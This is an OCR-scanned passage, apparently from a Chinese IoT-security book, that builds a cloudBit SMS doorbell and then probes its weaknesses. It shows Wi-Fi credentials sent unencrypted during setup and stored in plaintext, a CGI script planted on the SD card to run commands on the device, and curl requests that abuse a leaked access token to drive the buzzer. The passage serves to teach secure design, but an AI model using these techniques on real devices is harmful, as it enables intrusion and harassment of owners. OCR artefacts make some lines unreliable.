ii ifttt.com/myrecipes/personal/new 


Complete Trigger Fields 


Input received 


Lg . * 
5 Which cloudBit? 


SMS Door Bell 


Create Trigger 


图 7-13: 选择 我 们 的 cloudBit 配 方 


接 下 来 ， 点 击 “that”， 如 图 7-14 所 示 : 


局 ifttt.com/myrecipes/personal/new 


if 全 thenthat 


Input received by 
SMS. Door. Bell 


图 7-14: 点 击 “that” 选 择 我 们 的 cloudBit 作 为 配方 触发 器 


现在 ， 输 入 sms (如 图 7-15 所 示 ) ， 并 选择 它 作为 动作 通道 。 


ia ifttt.com/myrecipes/personal/new 


Choose Action Channel 


€"? 


Go to "https://ittt.com/myrecipes/personal/choose action?channel id-5" 


图 7-15: 选择 SMS 动 作 通道 


点 击 “Activate” 激 活 短信 通道 。 这 时 会 要 求 你 输入 一 个 有 效 的 手机 号 码 来 收取 短信 息 (如 图 7-16 所 示 ) 。 点 击 “Send PIN" (发 送 PIN 码 ) 将 识别 码 发 送 给 手机 。 收 到 
PIN 之 后 ， 在 网 站 上 输入 该 数字 ， 点 击 “Activate” ， 然 后 点 击 “Done below the SMS Activated! ” (完成 下 述 短信 激活 ! ) 。 点 击 “Continue” 进 入 下 一 步 操作 。 


WME, mt “Choose your Action section" (选择 动作 ) 下 边 的 “Send mean SMS" (发 送 短 信息 ) 。 现 在 ， 就 可 以 编辑 短信 了 ， 当 有 人 按 下 门铃 ， 编 辑 的 短信 就 会 
发 送 给 你 。 如 图 7-17 所 示 ， 我 们 看 到 了 一 个 定制 短信 息 的 例子 ， 内 容 是 “ 嗨 ， 有 人 按 我 了 ! 真 的 ,SMS_Door Bell。” 


mA "Create Action" (创建 动作 ) ， 为 配方 选 一 个 名 称 ， 然 后 点 击 “Create Recipe" (创建 配方 ) 。 到 此 ， 我 们 的 配方 可 以 工作 了 。 


a ifttt.com/channels/sms/activate?is web. view-1&amp;type 


Activate 
SMS 


Please enter your SMS enabled 
phone number to receive an 
activation PIN via SMS. All US carriers 
are supported. Some carriers outside 
of the US* are not supported yet. 


*For non-US numbers, include the leading 


00” and country code. If you do not receive 


the PIN, your carrier may not be supported 


Your phone number 


503- | 


Send PIN 


47-16: 激活 短信 通道 


74.3 ”哎呀 ,我 志 了 按钮 了 
稍 等 。 我 们 忘 了 添加 展示 门铃 的 按 馈 模 块 了 。 哎 呀 ! 如 果 没 有 一 个 真实 的 能 够 呈现 门铃 的 按钮 ， 我 们 的 项 目 就 不 完整 了 。 不 过 不 用 担心 :littleBits 本 身 就 是 一 个 优雅 的 原 
型 平台 ， 因 而 才 会 出 现 这 种 情况 。 添 加 一 个 按钮 并 不 会 影响 之 前 已 经 做 过 的 工作 。 


如 果 近 看 按钮 模块 (如 图 7-3 所 示 ) ， 你 就 会 看 到 它 上 边 有 一 个 向 右 的 箭头 。 这 表示 按钮 按 下 时 ， 模 块 的 右 侧 将 会 受到 触发 。 因 而 ， 按 钮 模块 需要 放置 在 cloudBit 的 左 
侧 。 


将 cloudBit 从 USB 电 源 模块 中 取 走 ，cloudBit 就 会 断 电 。 将 按钮 模块 接 入 到 电源 模块 ， 在 电源 模块 的 右 侧 接 上 cloudBit 模 块 。 项 目 看 上 去 如 图 7-18 所 示 。 


i ifttt.com/myrecipes/personal/new 


eoe < im 


Complete Action Fields 


Send me an SMS 


o Message 


Hey, someone pressed me! - 


Sincerely, ((DeviceName]) 


Create Action 


LI 


图 7-17: 自 定义 触发 短信 息 


图 7-18: 使 用 cloudBit 创 建 门铃 原型 


按 下 按钮 ， 手 机 上 就 会 收 到 短信 息 ， 如 图 7-19 所 示 。 


eeeeeAT&T F 


are 


Sunday, March 8 


W +i (415) 800-2479 
Hey, someone pressed me! -Sincerely, SMS Door Bell 


图 7-19: 来 自 IFTTT 的 短信 息 报 警 


即使 刚 开始 忘 了 添加 按钮 模块 ， 也 没什么 大 不 了 的 ， 只 要 事后 接 入 该 模块 就 可 以 了 ， 没 必要 做 其 他 重复 的 配置 ， 也 不 需要 重新 修改 配方 。 所 以 说 ，littleBits 是 一 个 很 棒 的 
原型 平台 。 


现在 ， 我 们 有 了 一 个 按 下 就 能 发 送 短 消 息 的 无 线 门铃 工作 原型 了 。 是 时 候 停 下 来 考虑 一 下 相关 的 安全 问题 了 。 易 受 漏洞 攻击 的 物 联网 产品 会 将 用 户 置 于 很 危险 的 境地 ， 也 
会 损害 制造 商 的 名 声 。 为 了 便于 分 析 ， 我 们 首先 要 研究 一 下 在 其 他 物 联 网 产品 上 已 经 确认 了 的 安全 问题 ， 看 看 我 们 的 原型 是 否 有 相似 的 漏洞 问题 。 然 后 ， 我 们 再 讨论 另 一 种 安 
全 机 制 ， 实 现 该 安全 机 制 能 够 让 我 们 的 原型 更 加 安全 ， 接 着 评估 一 下 当前 已 存在 的 物 联网 安全 框架 ， 以 确保 方法 的 全 面 性 。 


我 们 要 做 的 第 一 件 事 就 是 创建 一 个 工作 原型 配置 cloudBit， 使 其 能 提供 有 效 地 认证 信息 ， 访 问 到 我 们 的 家 庭 WiFi 网 络 (如 图 7-11 所 示 ) 。 最 终 的 产品 也 需要 用 户 输入 类 似 
方式 的 WiFi 认 证 信息 。 但 是 ， 对 于 我 们 来 讲 ， 它 是 我 们 了 解 设计 是 否 存在 潜在 危险 的 很 重要 的 因素 。 


现在 ， 我 们 必须 要 加 入 到 一 个 由 我 们 的 cloudbit 配 置 暴露 的 临时 WiFi 网 络 中 。 一 旦 加 入 到 cloudBit 网 络 中 ， 浏 览 器 就 会 连接 到 cloudBit 的 web 服 务 器 上 (IP 地 址 为 
10.0.0.1) ， 并 请 求 资源 http://10.0.0.1/scan-wifi， 返 回 的 输出 如 图 7-20 所 示 。 


eoe «x 10.0.0. 1/scan-wifi/ 


("survey": 1 
"accessPoints": 


"ssid": "HOME-0440", 
"mac": " " 
"security": "wpa2", 
"encryption": "on" 


"ssid": "42", 
"mac": " 

"security": "wpa", 
"encryption": "on" 


"ssid": "Idiot", 
"uci, m 
"security": "wpa2", 
"encryption": "on" 


"ssid": "xfinitywifi", 
"mac": " ". 
"security": "open", 
"encryption": "off" 


"ssid": "HOME-41E8", 
"mac": " pi^ 
"security": "wpa2", 
"encryption": "on" 


"ssid": "" 
"mac": 
"security": "wpa2", 
"encryption": "on" 


" 


图 7-20: cloudBit 查 询 获 取 WiFi 网 络 列表 


一 旦 浏览 器 从 cloudBi 户 b 蛙 获取 了 网 络 列表 ， 就 会 将 结果 呈现 给 用 户 (如 图 7-10 所 示 ) 。 当 用 户 选 择 自己 的 家 庭 网 络 并 输入 认证 新 信息 之 后 (如 图 7-11 所 示 ) ，web 浏 览 
器 就 会 发 送 如 下 所 示 的 HTTP 请 求 给 本 地 网 络 中 的 cloudBit: 


POST /set-wifi/ HTTP/1.1 

Host: 10.0.0.1 

Accept: */* 

Proxy-Connection: keep-alive 

Accept-Language: en-us 

Accept-Encoding: gzip, deflate 

Content-Type: application/x-www-form-urlencoded 

Origin: http://control.littlebitscloud.cc 

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10 10 2) 
AppleWebKit/600.3.18 (KHTML, like Gecko) Version/8.0.3 Safari/600.3.18 
Connection: keep-alive 

Content-Length: 92 

Referer: http://control.littlebitscloud.cc/ 

DNT: 1 


SSid-TOUCHOFCLASS&mac-771FA1263FEC&security-wpa2&encryption-on 
&password-topsecretpassword 


cloudBit 给 出 的 回应 如 下 : 


HTTP/1.1 200 OK 

Access-Control-Allow-Headers: Authorization, Content-Type, If-None-Match 
Access-Control-Allow-Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS 
Access-Control-Allow-Origin: * 

Access-Control-Expose-Headers: WWW-Authenticate, Server-Authorization 
Access-Control-Max-Age: 86400 

Content-Type: application/json; charset-utf-8 


Date: Sun, 08 Mar 2015 05:34:07 GMT 
Server: lighttpd/1.4.35 
Content-Length: 20 

( "success": true } 


发 送 了 响应 信息 之 后 ，cloudBit 会 使 用 一 个 绝密 的 密码 认证 信息 接 入 到 TouchOfClass WiFi 网 络 中 。 这 促使 cloudbit 访 问 littleBits 云 基础 设施 ， 人 允许 我 们 控制 来 
自 http://control.littlebitscloud.cc 网 站 的 模块 。 


这 里 我 们 要 牢记 一 个 安全 问题 : cloudBit 暴 露 的 WiFi 网 络 是 不 安全 的 ， 也 可 能 是 未 加 密 的 。 这 就 是 说 ， 任 何在 临时 网 络 范围 之 内 的 人 都 可 以 加 入 到 网 络 中 。 进 而 向 
cloudbit 发 送 的 POST/set-wifi/ 请 求 也 不 会 是 使 用 TLS 或 其 他 机 制 加 密 过 的 ， 这 就 允许 带 有 恶意 的 人 可 以 加 入 到 网 络 中 ， 并 轻松 获取 用 户 家庭 WiFi 网 络 的 认证 信息 。 


这 一 问题 的 风险 相对 比较 低 ， 因 为 攻击 者 必须 要 在 网 络 附近 ， 并 且 必 须 在 用 户 配置 cloudBit 期 间 开 始 行动 才 可 以 。 然 而 ， 正 如 我 们 在 前 边 章节 讨论 过 的 ， 任 何 已 经 被 远程 
控制 以 及 在 网 络 区 域 范围 内 的 计算 机 设备 都 能 够 持续 不 断 地 扫描 临时 cloudBit WiFi 网 络 ， 并 且 接 入 到 网 络 中 获取 认证 信息 ， 也 就 是 说 ， 攻 击 者 可 以 将 攻击 向 量 植 入 到 恶意 代码 
中 ， 之 后 通过 使 用 感染 了 恶意 软件 的 计算 机 设备 能 够 自动 完成 这 一 攻击 过 程 。 我 们 的 社会 到 处 都 是 物 联网 产品 ， 因 而 恶意 软件 的 开发 者 也 会 不 断 地 设计 出 病毒 软件 来 充分 利用 
这 一 形式 。 恶 意 软 件 可 以 感染 特定 的 设备 ， 依 赖 于 已 经 建立 的 WiFi 连 接 ， 而 一 般 WiFi 连 接 密码 是 已 加 密 的 形式 存储 。 进 而 ， 如 果 获 取 了 WiFi 网 络 的 明文 密码 则 增加 了 远程 攻击 
的 效率 。 


对 付 这 种 攻击 的 一 个 办 法 就 是 : 在 每 一 个 产品 中 嵌入 一 个 唯一 的 私有 密 钥 ， 这 个 代价 可 能 比较 高 。 作 者 的 观点 是 在 设备 上 印 一 个 序列 码 ， 作 为 真实 WiFi 密 码 的 加 密 密 钥 。 
连接 网 络 时 ， 用 户 必 须 提供 WiFi 密 码 和 设备 序列 号 ，WiFi 密 码 和 设备 序列 号 被 浏览 器 (使 用 JavaScript) 加 密 后 发 送 给 cloudBit， 使 用 序列 号 本 身 作为 key 就 能 解密 。 有 很 多 
加 密 方法 可 以 降低 产生 这 一 问题 的 风险 。 重 要 的 是 产品 制造 商 要 了 解 潜在 风险 ， 以 及 可 能 产生 的 后 果 ， 并 就 关于 实施 安全 机 制 ， 降 低 风 险 做 出 明智 的 业务 决策 。 


7.2.2 “后台 命令 执行 


第 5 章 ， 我 们 讨论 了 几 种 场景 ， 其 中 ， 访 问 文件 系统 的 情况 可 以 让 技术 高 超 的 人 和 恶意 团体 发 现 绕 过 安全 控制 和 潜在 漏洞 的 方法 。cloudBit 运 行 在 Linux 操 作 系统 中 ， 含 有 
一 个 安全 数字 卡 (SD card) ， 卡 上 面 就 有 一 个 文件 系统 。 本 节 ， 我 们 尝试 挂 载 SD 卡 ， 看 看 里 边 到 底 有 什么 内 容 。 


通过 将 cloudBit 与 按钮 模块 分 离 就 可 以 关闭 项 目 。 小 心 移 除 植 入 在 cloudBit 中 的 微型 SD 卡 ， 然 后 将 卡 插入 到 一 台 装 备 有 微型 SD 卡 读 卡 器 的 笔记 本 电脑 中 。SD 卡 应 该 可 以 
在 多 数 文 件 系统 中 被 识别 并 挂 载 。 在 OS X 操 作 系统 中 ， 你 需要 安装 OSxFuse 和 fuse-ext2 文 件 系统 ， 之 后 磁盘 就 会 自动 将 SD 卡 挂 载 到 /VolumesylittleRoot 目 录 下 。 


创建 一 个 可 以 滚动 的 文件 列表 是 一 个 好 主意 。 在 OS X 中 运行 如 下 指令 : 
$ ls -1R /Volumes/littleRoot/* ~/Desktop/littleRoot.txt 


然后 ， 查 看 ~/Desktop/littleRoot.txt 文 件 ， 找 找 有 没有 有 趣 的 文件 ， 比 如 etc/wpa_supplicant/cloudbit.conf: 


network={ 
ssid="TOUCHOFCLASS" 
#psk="youcann0tguessme!" 
psk-3f6380509ca89b4c5506£d39e7a3a8b2d5cda338b51accbad1f1850fefbabd47 
key mgmt-WPA-PSK 


这 里 ， 我 们 看 到 WiFi 密 码 是 以 明文 形式 存储 的 。 更 重要 的 是 ， 使 用 ssid 和 密码 进行 计算 的 预 共 享 密 钥 散 列 (PSK) 也 出 现在 文件 中 了 。 这 就 造成 了 任何 能 够 接触 到 门铃 的 
人 都 可 以 很 轻松 地 访问 文件 系统 ， 并 能 够 进入 到 用 户 家 庭 WiFi 网 络 中 。 比 较 好 的 加 强 控制 的 一 个 方法 是 将 密 钥 存储 在 一 个 硬件 处 理 器 中 (如 苹果 A7 处 理 器 ) 。 即 使 仅仅 是 门 
铃 这 样 的 一 款 产 品 ， 类 似 明 文 方式 存储 WiF 密码 这 样 的 存储 认证 信息 方式 也 会 将 用 户 整个 内 容 网 络 置 于 危险 的 境地 。 使 用 littleBits 平 台 构 建 原型 是 一 个 发 现 此 类 问题 的 好 方 
法 ， 你 可 以 通过 它 在 早期 发 现 安全 需求 在 哪里 。 


/srwhttp 目 录 中 含有 用 于 web 服 务 器 的 文件 ， 当 cloudbit 在 设置 模式 时 ， 该 web 服 务 器 处 于 激活 状态 。 我 们 可 以 将 可 执行 文件 脚本 放置 于 此 目录 下 ， 以 命令 的 方式 运行 
cloudBit 实 例 。 我 们 大 致 看 一 下 : 


[bash]$ cd /Volumes/littleRoot/srv/http/set-wifi 


然后 将 下 述 文件 (ps netstat.cgi) 放置 于 该 目录 下 : 


#!/bin/bash 

echo "Content-type: text/html" 
echo "" 

echo "" 

echo '«html»' 

echo '«body?' 

echo '«pre»' 

ps -aux 

echo "«br»«br»«br»" 


netstat -na 


echo '«/pre»' 


echo '«/body»' 


echo '«/html»' 


设置 正确 的 权限 : 


[bash] chown 33: appstore ps netstat.cgi 
[bash] chmod 755 ps netstat.cgi 


WE, SOÉXOBSSD-K, YreIEIcloudBitre, JEa/cloudBitfa, HERA, EXEULEDXTESEESDJMRU S, BARRA, ZUEXTASSIEPJMR. WAFIKA 
littliBit_Cloud...WiFi 网 络 中 ， 浏 览 http://10.0.0.1/set-wifi/shell.cgi 页 面 。 你 会 看 到 来 自 ps 和 netstat 命 令 的 输出 了 ， 如 图 7-21 所 示 。 
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Active Internet connections (servers and established) 


Proto Recv-0 Send-0 Local Address 
tcp 0 0.0.0.0:80 
tcp 0.0.0.0:53 
tcp 10.0.0.1:80 
tcp 10.0.0.1:80 
tcp6 1:11:53 

udp 0.0.0.0:53 
udp 0.0.0.0:67 
udp6 22253 


Active UNIX domain sockets (servers and established) 
I-Node Path 


Proto RefCnt Flags Type State 


从 10.0.0.1/set-wifi/ps netstat.cgi 


S< 


Foreign Address 
0.0.0.0:* 
0.0.0.0:* 
10.0.0.109:54820 
10.0.0.109:54819 


[deferwq] 

[xworker/0:1] 

[zmncqd/ 0] 

[ Jbà2 /mmcbik0p3-] 

[ext4-dio-unwrit] 

[Xworker/0:2] 
/usr/lib/systemd/systemd-journald 
[f£1ush-179:0] 
/usr/lib/systemd/systemd-udevd 
/usr/local/lb/LZDcolor/bin/LEDcolor.d 
/usr/local/lb/ADC/bin/ADC.d 

login -- root 

/usr/bin/dbus-daemon --system --address*sys 
/usr/local/lb/DAC/bin/DAC.d 

/bin/bash /ugr/local/lb/bit-util/monitorNet 
/usr/local/lb/Button/bin/button.d 
/usr/lib/systemd/systemd-logind 
/usr/lib/systemd/systemd --user 

(sd-pam) 

-bash 

[RTW CMD TEREAD] 

/usr/bin/dnsmasq -k --enable-dbus --user*dn: 
/usr/bin/dnsmasq -k --enable-dbus --usersdn: 
/usr/bin/lighttpd-angel -D -f /etc/lighttpd. 
/usr/bin/lighttpd -D -f /etc/lighttpd/light 
/usr/bin/hostapd /etc/hostapd/hostapd.conf 
sh -c /usr/local/lb/comm-util/start commiss 
/bin/bash /usr/local/lb/bit-util/monitorCom 
sleep 5 

Sleep 5 

/usr/bin/bash /srv/http/set-wifi/shell.cgi 
ps -aux 


State 
LISTEN 
LISTEN 
ESTABLISHED 
ESTABLISHED 
LISTEN 


图 7-21: 成 功 执行 ps 和 netstat 命 令 


这 是 在 cloudBit 上 执行 指令 实时 分 析 设备 操作 细节 的 一 种 比较 灵活 的 方法 。cloudBit 的 设计 者 并 不 想 让 人 们 能 够 直接 执行 cloudBit 上 的 本 地 命令 ， 因 为 这 会 破坏 产品 的 完 
整 性 。 因 而 ， 它 不 带 有 任何 可 以 远程 登录 到 其 上 运行 的 Linux 系 统 的 方式 。 然 而 ， 在 本 例 中 ， 我 们 找到 了 可 以 绕 过 这 一 限制 并 可 以 执行 本 地 指令 的 方法 。 另 一 个 我 们 需要 在 原 
型 设计 解决 要 考虑 的 安全 问题 的 例子 是 : 外 部 文件 无 法 实时 修补 运行 中 的 系统 ? 问题 是 文件 系统 是 通过 挂 载 内 存 来 访问 的 ， 反 过 来 这 就 允许 任意 用 户 能 够 访问 产品 ， 实 时 地 分 
析 系 统 了 。 解 决 办 法 是 : 不 要 通过 强行 隐匿 文件 来 阻止 这 类 攻击 ， 而 是 要 深入 地 对 产品 加 强 保护 web 服 务 器 或 其 他 服务 上 的 远程 漏洞 攻击 ， 因 为 这 类 攻击 不 仅 会 导致 门铃 被 控 
制 ， 甚 至 其 他 局 域 网 络 中 的 重要 物 联 网 设备 (比如 照明 灯 和 门 锁 ) 也 会 被 控制 。 


7.2.3 ”一 个 令 牌 即 可 解决 问题 


cloudBit 配 置 完 成 之 后 ， 就 可 以 访问 http://control.littlebitscloud.cc 网 站 ， 点 击 “Settings” 获 取 分 配给 cloudBit 的 Device ID 和 AccessToken， 如 图 7-22 所 示 。 


eoe < 0 control Ettlebitscloud.cc 3 t Cu o 


littleBits 


ELECTRONICS FOLLOW 


SMS_DOOR_BELL 


Two cloudBits can talk to each other if you have more than one. 
MY CLOUDBITS 


GET ANOTHER NOW 
SMS_Door_Bell 


ADVANCED 


Device ID: 
RESOURCES 


AccessToken: 


* à z iti 


END RECEIVE AUTOMATE SETTINGS 


47-22: 获取 分 配给 cloudBit 的 AccessToken 


AccessToken 用 于 cloudBit 的 远程 交互 。 例 如 ，https://api-http.littlebitscloud.cc/devices/DevicelD/input?access token-AccessToken&token type=bearer 形 式 的 
链接 显示 了 cloudBit 的 状态 。 它 每 秒 钟 使 用 了 cloudBit APl 来 查询 cloudBit 的 状态 。 图 7-23 输 出 中 的 第 一 列 列举 的 值 都 是 百分比 为 100 的 值 ， 这 是 因为 连接 到 cloudBit 上 的 按钮 
是 按 下 的 ， 从 而 导致 正 输入 被 发 送 给 了 cloudBit。 第 二 列 列 举 的 值 都 是 0， 表 示 按 钮 再 没有 被 按 下 。 


当 我 们 使 用 API 查 询 cloudBit 的 信息 时 ， 需 要 DeviceID 和 AccessToken。 然 而 ， 如 果 我 们 只 知道 AccessToken， 也 可 以 通过 如 下 与 用 户 有 关 的 方式 获取 DevicelD: 


$ curl -i -XGET -H "Authorization: Bearer [AccessToken DELETED]"-H 
"Accept: application/vnd.littlebits.v24*json" 
https://api-http.littlebitscloud.cc/devices 


eoo < iE = api-http.littlebitscloud.cc/device e 由 F o " 


data: ("type":"input","timestamp":1426060942806,"from":("device": 
("id": 0 e — 1 ,"device":"littlebits-module- 
cloud","setup version":"1.0.0","protocol version":"1.1.0","firmware version":"1.0.140611a","mac" 
","hash": ,"ap": 

ssid':" "strength":100),"settings": 
("label":"TBT3","input interval ms":750)),"user":("id" MM, "Seve: 
Ci RN 02170660606 1100, "absolute" 11023, "name" :" amplitude", "payload": 
("percent":100,"absolute":1023)) 


data:("type":"input","timestamp":1426060943467,"from":("device": 

{"id": "0060 1 ,"device":"littlebits-module- 

cloud","setup version":"1.0.0","protocol version":"1.1.0","firmware version":"1.0.140611a","mac" [i 
" "hash" : "F719 ,"ap": 

("ssid": Ü) BÀ ,"mac": "strength":100),"settings": 

("label":"TBT3","input interval ms":750)), "user" :{"id" MM, "server'": 

["Ld":" ")),"percent":0,"absolute":4,"name":"amplitude","payload":("percent":0,"absolute":4)) 


data: ("type":"input","timestamp":1426060944205,"from":("device": 


图 7-23: 使 用 cloudBit API 搜 集 与 cloudBit 连 接 的 相关 信息 


HTTP/1.1 200 OK 

accept-ranges: bytes 

access-control-allow-headers: Authorization, Content-Type, If-None-Match 
access-control-allow-methods: GET, HEAD, POST, PUT, PATCH, DELETE, OPTIONS 
access-control-allow-origin: * 

access-control-expose-headers: WWW-Authenticate, Server-Authorization 
access-control-max-age: 86400 

cache-control: no-cache 

content-type: application/json; charset-utf-8 

Date: Thu, 02 Apr 2015 04:51:49 GMT 

Content-Length: 272 

Connection: keep-alive 


[("label":"SMS Door Bell","id":"[DELETED]","user id":[DELETED],"is connected": 
true, "ap": ("ssid": TOUCHOFCLASS" , "mac" : " [DELETED] ", "strength":"99","server id" 
:"DfhIt251","socket id":"FlPDVb211","status":"2"], "subscriptions": [], 一 
"subscribers":[],"input interval ms":750}] 


curl 命 令 返 回 的 id 值 就 是 与 用 户 账号 相关 的 DevicelD。 这 证 明了 AccessToken 值 的 机 密 性 最 终 确 保 了 访问 cloudBit 的 安全 性 。cloudBit API 没 有 向 开发 人 员 开 放 请 求 新 的 
AccessToken 的 方法 ， 因 而 ， 提 供 的 AccessToken 是 长 期 有 效 的 。 鉴 于 littleBits 和 cloudBit 平 台 并 不 用 于 生产 用 途 ， 因 而 原型 本 身 风 险 很 低 。 然 而 ， 设 计 人 员 可 能 会 给 出 解决 
最 终 产品 过 期 以 及 刷新 AccessToken 的 方法 。 这 将 防止 令 牌 长 其 有效， 增加 产品 被 攻陷 的 几率 。 


现在 ， 我 们 为 原型 增加 一 个 蜂 鸣 模 块 。 如 图 7-24 所 示 ， 我 们 将 蜂 鸣 模 块 附 到 cloudBit 的 右 人 出。 现在 ， 按 下 按钮 ， 不 仅 会 发 送 短 消 息 ， 还 会 激活 本 地 的 音频 发 出 蜂 鸣 声 ， 就 
跟 传统 的 门铃 一 样 。 这 进一步 证 明了 littleBits 原 型 平台 的 功能 强大 : 设计 人 员 能 够 基于 新 的 思路 ， 随 时 增加 并 改变 功能 。 


图 7-24: 附加 到 短 消息 门铃 上 的 蜂 鸣 模块 


为 了 让 原型 能 够 发 送 短 消息 并 激活 蜂 鸣 模 块 ， 我 们 必须 创建 另 一 个 IFTTT 配 方 ， 这 需要 选择 cloudBit 既 用 作 输出 也 可 用 作 输 入 (如 图 7-25 所 示 ) 。 
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图 7-25: 人 额外 的 带 有 蜂 鸣 声响 的 配方 


最 终 产品 会 包含 一 个 智能 手机 应 用 程序 ， 应 用 程序 中 必须 要 保存 本 地 文件 系统 的 令 牌 。 如 果 应 用 程序 或 手机 被 攻陷 了 ， 攻 击 者 就 会 获取 访问 令 牌 的 权限 。 另 一 种 情况 是 攻 
击 存储 在 littleBits 服 务 器 上 的 有 问题 访问 令 牌 。 这 会 导致 允许 攻击 者 控制 所 有 的 在 线 cloudBit 模 块 。 一 旦 完成 了 初始 原型 ， 考 虑 这 一 情况 将 会 帮助 设计 人 员 理解 实现 令 牌 过 期 
和 刷新 机 制 的 重要 性 。 如 果 某 个 恶意 团体 获取 了 令 牌 的 访问 权 ， 只 需要 一 个 简单 的 命令 ， 如 下 边 的 例子 中 给 出 的 ， 就 会 导致 原型 的 蜂 鸣 器 不 停 地 发 出 刺耳 的 声音 : 


$ curl -i -XPOST -H "Authorization: Bearer [AccessToken DELETED]: 
application/vnd.littlebits.v24json" 
https://api-http.littlebitscloud.cc/devices/[DeviceID DELETED]/output 
-d percent-100 -d duration ms--1 


HTTP/1.1 200 OK 

access-control-allow-headers: Authorization, Content-Type, If-None-Match 
access-control-allow-methods: GET, HEAD, POST, PUT, PATCH, DELETE, OPTIONS 
access-control-allow-origin: * 

access-control-expose-headers: WWW-Authenticate, Server-Authorization 
access-control-max-age: 86400 

cache-control: no-cache 

content-type: application/json; charset-utf-8 

Date: Thu, 02 Apr 2015 05:49:08 GMT 

Content-Length: 16 

Connection: keep-alive 


想象 一 下 ， 深 更 半夜 被 门铃 刺耳 的 蜂 鸣 声 惊醒 的 场景 。 胆 大 的 人 可 能 会 马上 看 看 谁 在 门 外 ， 但 发 现 没 人 在 ， 可 门铃 还 是 不 停 地 蜂 鸣 时 ， 可 能 会 更 加 困惑 。 设 计 人 员 需 要 在 
原型 设计 早期 就 能 够 理解 这 种 类 型 的 用 例 (恶意 的 用 例 ) ， 这 是 为 了 在 后 续 产 品 和 迭代 过 程 中 的 每 一 个 步骤 都 能 降低 产品 被 滥用 的 危害 或 侵扰 用 户 的 可 能 性 。 


7.2.4 注意 硬件 调试 接口 


物 联网 设备 经 常会 有 一 些 用 于 调试 ， 需 要 物理 访问 的 硬件 端口 。 资 深 技 术 人 员 和 安全 研究 人 员 已 经 发 现 : 通过 使 用 物理 调试 接口 改变 固件 是 可 以 修改 设备 功能 的 。 也 可 能 
通过 这 种 方式 挖掘 出 设备 内 的 机 密 文 件 ， 如 加 密 密 钥 。 如 果 将 加 密 密 钥 用 在 同类 型 的 其 他 设备 上 ， 攻 击 者 就 能 使 用 获取 的 密 钥 信息 通过 一 次 访问 并 提取 信息 来 破坏 其 他 设备 的 


完整 性 。 


通用 异步 收发 器 (Universal Asynchronous Receiver Transmitter, UART) 芯片 常用 在 微 控制 器 中 ， 并 用 于 实现 调试 功能 。 它 们 使 用 串口 (一 次 一 个 比特 的 速率 传输 ) 
通信 方式 在 客户 端 设 备 和 微 控 制 器 之 间 传 输 信息 。 要 完成 上 述 功能 ， 第 一 步 是 要 找到 VCC (电源 ) 、GND (接地 ) 、RX (接收 ) 、TX (发 送 ) 引 脚 ， 如 图 7-26 所 示 。 


图 7-26: UART 通 信 引 脚 


除了 观测 ， 还 可 用 万 用 表 测 量 电压 来 确定 UART 引 脚 。 万 用 表 应 设 为 连续 模式 ， 大 多 数 万 用 表 都 提供 该 功能 。 该 模式 可 以 测 电路 板 上 两 点 之 间 的 电阻 。 如 果 电 阻 低 ， 意 味 
着 两 点 之 间 有 电流 ， 万 用 表 会 发 出 声响 。 如 果 两 点 之 间 电 阻 比较 高 ， 表 示 电 路 是 断 开 的 ， 则 万 用 表 不 会 发 出 声音 。 


为 了 找到 接地 引 脚 ， 在 电路 板 上 找 一 块 金 属 屏蔽 的 区 域 (也 就 是 有 金属 盖 板 的 地 方 ) ， 将 黑色 万 用 表 探 头 放 上 去 。 接 下 来 ， 将 红色 探头 放 到 估计 是 接地 的 引 脚 上 。 如 果 万 
用 表 发 出 声响 ， 表 示 该 引 脚 是 接地 的 ， 确 定 是 接地 引 脚 。UART 一 般 会 有 4 个 以 上 引 脚 ， 因 此 需要 在 电路 板 上 找 一 块 有 4 个 紧 挨 着 的 引 脚 区 域 。 


如 果 红色 探头 放 在 电源 引 脚 上 ， 万 用 表 会 发 出 一 个 短促 的 蜂 鸣 声 ， 而 不 是 一 个 连续 的 声音 。 这 对 于 找到 电源 引 脚 很 有 帮助 ， 这 样 我 们 就 会 知道 找到 的 引 脚 不 是 发 送 或 接受 
引 脚 。 


UART 上 的 传输 引 脚 通常 会 导致 万 用 表 的 电压 值 在 3.3 伏 左右 。 当 传输 引 脚 发 送 数据 时 (通常 是 当 设 备 加 电 并 启动 固件 时 ) ， 电 压 会 降 到 0 伏 ， 然 后 又 返回 为 3.3 伏 。 万 用 表 
会 计算 采样 电压 的 平均 值 ， 在 数据 传输 时 ， 值 会 下 降 ， 特 别 是 在 设备 刚 通电 时 。 


找到 接收 引 脚 稍微 困难 些 : 最 好 的 方式 是 排除 法 ， 除 了 接地 引 脚 、 电 源 引 脚 和 传输 引 脚 之 外 ， 剩 下 的 就 是 接收 引 脚 。 
为 了 与 UART 通 信 ， 需 要 使 用 一 个 简单 的 UART 转 USB 接 头 。 需 要 将 接地 引 脚 接 到 适配器 的 接地 引 脚 上 ， 然 后 对 接 UART 和 接头 的 传输 与 接收 引 脚 。 


可 以 使 用 一 个 简单 的 通信 程序 一 一 Minicom ， 该 程序 用 于 连接 UART 并 与 其 交互 。 然 而 ， 我 们 需要 告诉 Minicom 确 切 的 波 特 率 ( 波 特 是 个 单位 ， 表 示 一 秒 内 传输 多 少 
位 ) 。 波 特 率 工具 可 用 于 自动 检测 波 特 率 并 连接 到 设备 上 。 


“串口 逆向 工程 ”教程 告诉 我 们 如 何 找到 UART 引 脚 ， 如 何 连接 到 硬件 设备 的 UART 来 获取 设备 上 系统 shell 的 访问 权限 。 


Exploitee.rs 网 站 是 个 很 不 错 的 资源 ， 它 提供 了 确定 很 多 流行 设备 UART 引 脚 和 波 特 率 的 图 像 资料 。 这 些 信息 可 用 于 获取 UART 的 访问 权 以 配置 设备 、 获 取 固件 和 更 新 设备 
固件 ， 最 终 目的 是 为 设备 添加 新 特性 以 绕 过 生产 商 设计 的 安全 控制 和 限制 措施 。 


cloudBit 模 块 网 站 声明 : “我 们 在 电路 板 下 加 了 垫 层 ， 你 可 以 使 用 3.3 伏 UART (8-N-1，115200 波 特 率 ) 连接 cloudBit 的 串口 控制 台 并 输入 指令 ”。 读 者 如 果 有 UART 硬 件 
和 本 书 提供 的 在 线 工 具 软 件 ， 可 以 使 用 波 特 设 定 列表 (8-N-1，115200 波 特 率 ) 来 修补 cloudBit 的 UART 接 口 。 


另 一 款 流行 的 硬件 调试 接口 是 由 Joint Test Action Group (JTAG) 实现 的 。 有 好 几 种 丁 AG 引 脚 组 合 方法 。 大 多 数 JTAG 接 口 都 有 5 个 基本 引 脚 : TDI (测试 数据 入 ) 、 
